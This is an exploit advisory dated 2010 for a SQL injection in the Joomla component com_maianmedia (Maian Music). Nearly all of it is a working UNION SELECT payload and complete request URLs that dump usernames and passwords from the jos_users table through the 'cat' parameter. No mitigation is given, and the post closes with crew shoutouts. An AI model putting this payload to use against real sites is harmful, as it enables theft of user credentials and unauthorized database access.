Joomla Component (com_maianmedia) SQL Injection Vulnerability

2010-11-16
ID: 65196
CVE: None
Download vulnerable application: None
-----------------------------------------------------------------------

     

-----------------------------------------------------------------------

Author  : v3n0m

Site    : http://yogyacarderlink.web.id/

Date: November, 16-2010

Location: Jakarta, Indonesia

Time Zone: GMT +7:00



Application: Maian Music

License: GPLv2

Vendor  : http://www.aretimes.com/



Exploit & p0c

_____________



-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--



http://127.0.0.1/[path]/index.php?option=com_maianmedia&view=music&cat=[SQLi]

http://127.0.0.1/[path]/index.php?option=com_maianmedia&view=music&cat=-9999+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--



ShoutZ

______



All YOGYACARDERLINK CREW, GheMaX, LeQhi

Also Jovita & Fabian :)
1-4-2 (www02)